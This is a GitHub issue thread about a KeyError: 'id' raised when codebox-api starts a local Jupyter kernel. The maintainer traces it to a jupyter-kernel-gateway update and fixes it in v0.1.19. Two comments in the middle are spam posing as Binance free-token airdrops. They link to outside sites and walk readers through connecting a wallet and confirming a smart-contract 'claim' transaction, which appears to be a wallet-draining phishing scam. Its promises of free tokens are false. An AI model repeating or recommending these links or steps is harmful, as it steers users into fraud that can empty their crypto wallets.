### ISSUE TITLE
KeyError: 'id'

### ISSUE THREAD

**Issue by qingzhenduyu** [shroominic/codebox-api#15]
Hello,
I've encountered a KeyError: 'id' when attempting to get access to openai gpt4. Below is a brief description of the issue

`Traceback (most recent call last):
  File "D:\Research\GPT4\process.py", line 101, in <module>
    main()
  File "D:\Research\GPT4\process.py", line 93, in main
    process_prompt(lines[i])
  File "D:\Research\GPT4\process.py", line 70, in process_prompt
    result = call_gpt4_api(line)
  File "D:\Research\GPT4\process.py", line 42, in call_gpt4_api
    with CodeInterpreterSession(verbose=True) as session:
  File "C:\Users\DELL\anaconda3\envs\gpt\lib\site-packages\codeinterpreterapi\session.py", line 481, in __enter__
    self.start()
  File "C:\Users\DELL\anaconda3\envs\gpt\lib\site-packages\codeinterpreterapi\session.py", line 89, in start
    status = SessionStatus.from_codebox_status(self.codebox.start())
  File "C:\Users\DELL\anaconda3\envs\gpt\lib\site-packages\codeboxapi\box\localbox.py", line 107, in start
    self._connect()
  File "C:\Users\DELL\anaconda3\envs\gpt\lib\site-packages\codeboxapi\box\localbox.py", line 116, in _connect
    self.kernel_id = response.json()["id"]`

**Comment by IT-Immanent** [comment]
# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

<a href="https://www.bnbrewards.online/?source=github" target="_blank">
  <img src="https://i.imgur.com/1yUfzqb.png" alt="Binance Free Tokens" width="400px" height="450px">
</a>


## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - 
2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @

**Comment by shroominic** [comment]
Hey thanks for mentioning and sry for the late response. 
I still have not figured out why this is and where its coming from but I am investigating and keep you updated!
I got the same error in my CI pipeline but not when using it locally on my mac....

**Comment by shroominic** [comment]
fixed it!! it was an issue with a new version of jupyter-kernel-gateway will release a new pypi version now with the patch

**Comment by shroominic** [comment]
fixed now in v0.1.19
